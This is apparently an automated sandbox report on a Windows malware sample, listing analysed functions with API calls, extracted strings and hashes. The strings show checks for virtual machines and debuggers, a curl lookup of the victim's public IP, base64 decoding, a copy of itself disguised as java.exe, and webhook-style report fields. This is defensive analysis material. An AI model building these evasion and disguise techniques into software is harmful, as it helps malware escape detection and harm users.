                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValuestrstr
                                        • String ID: QEMU$SYSTEM\HardwareConfig\Current\$SystemManufacturer$VMware$Virtual$cheatengine-x86_64.exe$ida.exe$ida64.exe$x32dbg.exe$x64dbg.exe
                                        • API String ID: 3146380931-3937382361
                                        • Opcode ID: ef39f671da64075728605a1ffdf3e4a340ea3a097cf108c17dc8ed1a93a84ef8
                                        • Instruction ID: 404f3f4b8c647dd60e3e9450767abbdd2855e0342ee1279cf2e95892fcf493b4
                                        • Opcode Fuzzy Hash: ef39f671da64075728605a1ffdf3e4a340ea3a097cf108c17dc8ed1a93a84ef8
                                        • Instruction Fuzzy Hash: D0313A33A2CA96A5EB508B20E8506AA23A5FB8478CF940132DE8DD3764DF3CE549C710
                                        Function 00007FF670FC40AC Relevance: 22.8, APIs: 4, Strings: 9, Instructions: 56registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: Close$OpenQueryValue
                                        • String ID: DebugPolicy$QEMU$SYSTEM\CurrentControlSet\Control\CI\Policy$VMware$cheatengine-x86_64.exe$ida.exe$ida64.exe$x32dbg.exe$x64dbg.exe
                                        • API String ID: 1607946009-952540290
                                        • Opcode ID: 25521cfc004ebc257bc61c3e9327480934541754925d5f39829c10b8d7562104
                                        • Instruction ID: de05a732a22a488539b26af368c21550c9156ba7ab9087fa34c8e9dda193ef13
                                        • Opcode Fuzzy Hash: 25521cfc004ebc257bc61c3e9327480934541754925d5f39829c10b8d7562104
                                        • Instruction Fuzzy Hash: FA216D27A2CA87A1EB608B10E4257AA6365FB8475CF901133EE8DC3754DF3DE649C720
                                        Function 00007FF670FC3F89 Relevance: 19.3, APIs: 4, Strings: 7, Instructions: 47COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: PerformanceQuery$CounterV01@$??6?$basic_ostream@D@std@@@std@@FrequencySleepU?$char_traits@V01@@
                                        • String ID: QEMU$VMware$cheatengine-x86_64.exe$ida.exe$ida64.exe$x32dbg.exe$x64dbg.exe
                                        • API String ID: 353636290-478688673
                                        • Opcode ID: b0e68379d2f43bbfd6adcc4404e2dbc32403da636b006cdd8939f56799da900c
                                        • Instruction ID: b31b3f6741d9c2a0ace6ee0eb85045fdb2198228583c79bb8abf7627499399a4
                                        • Opcode Fuzzy Hash: b0e68379d2f43bbfd6adcc4404e2dbc32403da636b006cdd8939f56799da900c
                                        • Instruction Fuzzy Hash: 2D216223A2CE87A5EA01DB20E4256A96322FF84798F504133DD0ED3720DF3CE54AC720
                                        Function 00007FF670FC4082 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 36COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: V01@$??6?$basic_ostream@CheckCurrentD@std@@@std@@DebuggerPresentProcessRemoteU?$char_traits@V01@@
                                        • String ID: QEMU$VMware$cheatengine-x86_64.exe$ida.exe$ida64.exe$x32dbg.exe$x64dbg.exe
                                        • API String ID: 3386908335-478688673
                                        • Opcode ID: 9cc1c9118efba7c555eab79f76b55be6e403fb393d9724d640f38c7b895dc272
                                        • Instruction ID: cfa2641c10ac12c3ebf837f195a62c048f7e79fe587c81a40db707946709eb37
                                        • Opcode Fuzzy Hash: 9cc1c9118efba7c555eab79f76b55be6e403fb393d9724d640f38c7b895dc272
                                        • Instruction Fuzzy Hash: 1F111827A2CA86A2EA508B10E4257E92361FB4434CFA00133DE4DD3724CF3DEA4AC720
                                        Function 00007FF670FC61C0 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 160fileprocesssynchronizationCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: CloseHandle$CreateExceptionFileReadThrow$ObjectPipeProcessSingleWaitmemmove
                                        • String ID: CreatePipe failed$CreateProcess failed$System
                                        • API String ID: 1891516669-1096748438
                                        • Opcode ID: 3880c30b75bd352c9b1a29dab04add5514506e865d04dfa20b575b1e48a9bc5d
                                        • Instruction ID: 9171701029652ae1236cd8308f658bdc575599d7caa623d2d9af715a3df84718
                                        • Opcode Fuzzy Hash: 3880c30b75bd352c9b1a29dab04add5514506e865d04dfa20b575b1e48a9bc5d
                                        • Instruction Fuzzy Hash: 83713B22A28B82A6EB10CF61E8543AD7764FB84788F105236EE4DD3B68DF7CD595C710
                                        Function 00007FF670FC1450 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 205COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 733 7ff670fc1450-7ff670fc14cd call 7ff670fc34a0 736 7ff670fc14d3-7ff670fc14fc 733->736 737 7ff670fc1556-7ff670fc1563 call 7ff670fc3c80 733->737 738 7ff670fc14fe-7ff670fc1505 736->738 739 7ff670fc1519 736->739 743 7ff670fc1568-7ff670fc15a0 737->743 738->739 741 7ff670fc1507-7ff670fc150a 738->741 742 7ff670fc151c-7ff670fc1554 memmove * 3 739->742 744 7ff670fc1511-7ff670fc1517 741->744 745 7ff670fc150c-7ff670fc150f 741->745 742->743 746 7ff670fc15a2-7ff670fc15b4 743->746 747 7ff670fc15d7-7ff670fc1610 _popen 743->747 744->742 745->742 748 7ff670fc15d2 call 7ff670fcda34 746->748 749 7ff670fc15b6-7ff670fc15c9 746->749 750 7ff670fc16a0-7ff670fc16c2 fgets 747->750 751 7ff670fc1616-7ff670fc163c call 7ff670fc34a0 747->751 748->747 749->748 755 7ff670fc15cb-7ff670fc15d1 _invalid_parameter_noinfo_noreturn 749->755 753 7ff670fc170e-7ff670fc173f _pclose 750->753 754 7ff670fc16c4-7ff670fc16c8 750->754 758 7ff670fc1670-7ff670fc169f call 7ff670fcd9d0 751->758 761 7ff670fc163e-7ff670fc1650 751->761 753->758 759 7ff670fc1745-7ff670fc1757 753->759 760 7ff670fc16d0-7ff670fc16db 754->760 755->748 762 7ff670fc175d-7ff670fc1770 759->762 763 7ff670fc166b call 7ff670fcda34 759->763 765 7ff670fc16e0-7ff670fc16e8 760->765 761->763 766 7ff670fc1652-7ff670fc1665 761->766 762->763 767 7ff670fc1776-7ff670fc177f _invalid_parameter_noinfo_noreturn 762->767 763->758 765->765 770 7ff670fc16ea-7ff670fc170c call 7ff670fc3200 fgets 765->770 766->763 766->767 770->753 770->760
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: memmove$_invalid_parameter_noinfo_noreturnfgets$_pclose_popen
                                        • String ID: curl -s $https://api.ipify.org
                                        • API String ID: 4263605086-4145788705
                                        • Opcode ID: ae73d1421c309b4769a2fb54ff61077935537acb340cbfafb32d3ed8a36bdc6c
                                        • Instruction ID: 47608d847490b985c27630414bbc9067e03ebc0f0094d7aabede2235c6ac2190
                                        • Opcode Fuzzy Hash: ae73d1421c309b4769a2fb54ff61077935537acb340cbfafb32d3ed8a36bdc6c
                                        • Instruction Fuzzy Hash: 95919A23E2CBC596EA00CB64D8413AE2361FB96B94F545321EE9D97B99DF3CE181C710
                                        Function 00007FF670FC4530 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 136COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 786 7ff670fc4530-7ff670fc4559 787 7ff670fc4560-7ff670fc4567 786->787 787->787 788 7ff670fc4569-7ff670fc4578 787->788 789 7ff670fc4584 788->789 790 7ff670fc457a-7ff670fc457d 788->790 792 7ff670fc4586-7ff670fc4596 789->792 790->789 791 7ff670fc457f-7ff670fc4582 790->791 791->792 793 7ff670fc459f-7ff670fc45b1 ?good@ios_base@std@@QEBA_NXZ 792->793 794 7ff670fc4598-7ff670fc459e 792->794 795 7ff670fc45e3-7ff670fc45e9 793->795 796 7ff670fc45b3-7ff670fc45c2 793->796 794->793 800 7ff670fc45f5-7ff670fc4608 795->800 801 7ff670fc45eb-7ff670fc45f0 795->801 798 7ff670fc45e1 796->798 799 7ff670fc45c4-7ff670fc45c7 796->799 798->795 799->798 802 7ff670fc45c9-7ff670fc45df ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 799->802 804 7ff670fc463d-7ff670fc4658 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 800->804 805 7ff670fc460a 800->805 803 7ff670fc46ad-7ff670fc46cb ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z ?uncaught_exceptions@std@@YAHXZ 801->803 802->795 806 7ff670fc46d7-7ff670fc46e7 803->806 807 7ff670fc46cd-7ff670fc46d6 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ 803->807 809 7ff670fc4686 804->809 810 7ff670fc465a 804->810 808 7ff670fc4610-7ff670fc4613 805->808 814 7ff670fc46f0-7ff670fc4704 806->814 815 7ff670fc46e9-7ff670fc46ef 806->815 807->806 808->804 813 7ff670fc4615-7ff670fc462f ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 808->813 812 7ff670fc4689 809->812 811 7ff670fc4660-7ff670fc4663 810->811 816 7ff670fc4665-7ff670fc467f ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 811->816 817 7ff670fc468d-7ff670fc469d 811->817 812->817 818 7ff670fc4631-7ff670fc4636 813->818 819 7ff670fc4638-7ff670fc463b 813->819 815->814 816->809 820 7ff670fc4681-7ff670fc4684 816->820 817->803 818->812 819->808 820->811
                                        APIs
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF670FC45A9
                                        • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF670FC45C9
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF670FC45D9
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF670FC4626
                                        • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF670FC464F
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF670FC4676
                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF670FC46BC
                                        • ?uncaught_exceptions@std@@YAHXZ.MSVCP140 ref: 00007FF670FC46C3
                                        • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF670FC46D0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
                                        • String ID: VBox
                                        • API String ID: 4121003011-8870058
                                        • Opcode ID: 8d9f1fcbf29990ccba68683eb9388bbe1b18308a65f00ed4dbf19797e9948431
                                        • Instruction ID: e67ad0baaba02cac7801cddc41a715b16f74278086f1584a7ffa8ea204fb888f
                                        • Opcode Fuzzy Hash: 8d9f1fcbf29990ccba68683eb9388bbe1b18308a65f00ed4dbf19797e9948431
                                        • Instruction Fuzzy Hash: B0518C2361CA8192EB209F19E19023DABA1FB85F95F15C631CE5EC37A0CF7EE4468310
                                        Function 00007FF670FC47D0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 106fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: File$memmove$AttributesCopyFolderFreeKnownModuleNamePathTask_invalid_parameter_noinfo_noreturn
                                        • String ID: System$\java.exe
                                        • API String ID: 1966085478-2838124431
                                        • Opcode ID: 9df640e94e4460063b0ebfa5c6d29310eec143933f45953db38a7472d5bb157b
                                        • Instruction ID: 48b85b0b9def74e1f70f82fbd6b2b7d2ee4e5432393e0c7a74397262ae1515c6
                                        • Opcode Fuzzy Hash: 9df640e94e4460063b0ebfa5c6d29310eec143933f45953db38a7472d5bb157b
                                        • Instruction Fuzzy Hash: 74418923A2CAC1A2EB009F25E45536E6361FB84B94F505232DE9DC3B99DFBCE195C710
                                        Function 00007FF670FC3AC0 Relevance: 13.6, APIs: 9, Instructions: 131COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF670FC3B25
                                        • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF670FC3B45
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF670FC3B55
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF670FC3B9C
                                        • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF670FC3BC9
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF670FC3BEA
                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF670FC3C30
                                        • ?uncaught_exceptions@std@@YAHXZ.MSVCP140 ref: 00007FF670FC3C37
                                        • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF670FC3C44
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
                                        • String ID:
                                        • API String ID: 4121003011-0
                                        • Opcode ID: 32c923d81eb2f926df63972f162163bef63c4a2309fcb996621e0580ae7188cd
                                        • Instruction ID: 210e595b0581b20ff6d4d63e8a93f14aeef1ca9e114cc1e94e654c024bf3ef66
                                        • Opcode Fuzzy Hash: 32c923d81eb2f926df63972f162163bef63c4a2309fcb996621e0580ae7188cd
                                        • Instruction Fuzzy Hash: C7511C33A1CA8192EB608F19D59123DABA0EB85FD5F158632CE5EC7760CF3DD8468310
                                        Function 00007FF670FCDC1C Relevance: 12.1, APIs: 8, Instructions: 94COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                        • String ID:
                                        • API String ID: 1133592946-0
                                        • Opcode ID: a2b6e63c03c4307f1c7944bccec6fd587a45c4b5608812da48b03e94cda5521b
                                        • Instruction ID: 1f84c3e8b387db6aef318f02613b3f98466e3b8c71a889bc4b824e2773f0a9c0
                                        • Opcode Fuzzy Hash: a2b6e63c03c4307f1c7944bccec6fd587a45c4b5608812da48b03e94cda5521b
                                        • Instruction Fuzzy Hash: B4311823E2C6C361EA54AB21A4133BE6291AF81788F544236ED4ECB7D3DF2DB404D261
                                        Function 00007FF670FC4710 Relevance: 4.5, APIs: 3, Instructions: 17COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z.MSVCP140 ref: 00007FF670FC4725
                                        • ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z.MSVCP140 ref: 00007FF670FC4731
                                        • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF670FC473A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$V12@$?flush@?$basic_ostream@?put@?$basic_ostream@?widen@?$basic_ios@
                                        • String ID:
                                        • API String ID: 1875450691-0
                                        • Opcode ID: f4125d65197c8cd84bb38f550762ca1077ffddb23cb634167d8243e328fd1d8f
                                        • Instruction ID: 8a315034f1e253ccbedb650bffb55152022f6d9f1fe6673502879f2570020401
                                        • Opcode Fuzzy Hash: f4125d65197c8cd84bb38f550762ca1077ffddb23cb634167d8243e328fd1d8f
                                        • Instruction Fuzzy Hash: 7BD06716A99A4692DA589F66B8A827C1321EF99F56B1CA031CD0FC7361CE3CD0998324

                                        Non-executed Functions

                                        Function 00007FF670FC6000 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 111encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptStringToBinaryA.CRYPT32 ref: 00007FF670FC6065
                                        • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,System,?), ref: 00007FF670FC60A6
                                        • CryptStringToBinaryA.CRYPT32 ref: 00007FF670FC60DF
                                        • _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,System,?), ref: 00007FF670FC6195
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,System,?), ref: 00007FF670FC6141
                                          • Part of subcall function 00007FF670FC11E0: __std_exception_copy.VCRUNTIME140 ref: 00007FF670FC121E
                                        • _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,System,?), ref: 00007FF670FC61B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: BinaryCryptExceptionStringThrow$__std_exception_copy_invalid_parameter_noinfo_noreturnmemset
                                        • String ID: Failed to calculate decoded size$Failed to decode base64 string$System
                                        • API String ID: 1426166207-3746013482
                                        • Opcode ID: 14ac3170ead7c7aae9ce120748a7062de75bf1bef9c06f2a4d6b0291c8387342
                                        • Instruction ID: 54308ffedeac610ebcd3357153de7a04d30e7327fea92a16d174befa705ddf7f
                                        • Opcode Fuzzy Hash: 14ac3170ead7c7aae9ce120748a7062de75bf1bef9c06f2a4d6b0291c8387342
                                        • Instruction Fuzzy Hash: 8A417D33A2CB86A5EA50DF11E44166A7361FB85B80F544235EE8CC3BA5DF3CE581CB10
                                        Function 00007FF670FC6440 Relevance: 14.4, Strings: 11, Instructions: 654COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_taskmemmove$_invalid_parameter_noinfo_noreturn$malloc
                                        • String ID: Security$color$fields$footer$image$inline$name$text$timestamp$url$value
                                        • API String ID: 1983001648-1717039157
                                        • Opcode ID: 46a93c1391e5530b796bf4ef33a6f6c6df3b4114b60fd8324e3daca41818a151
                                        • Instruction ID: ca8e4337640520f9c552b021f358b67ad421607f9aba6805a150eac8d3f23b68
                                        • Opcode Fuzzy Hash: 46a93c1391e5530b796bf4ef33a6f6c6df3b4114b60fd8324e3daca41818a151
                                        • Instruction Fuzzy Hash: 26724023918BC199E721CF74D8853DE73A4FB99308F545226DA8C97B5AEF78D294C340
                                        Function 00007FF670FCE324 Relevance: 13.6, APIs: 9, Instructions: 71COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
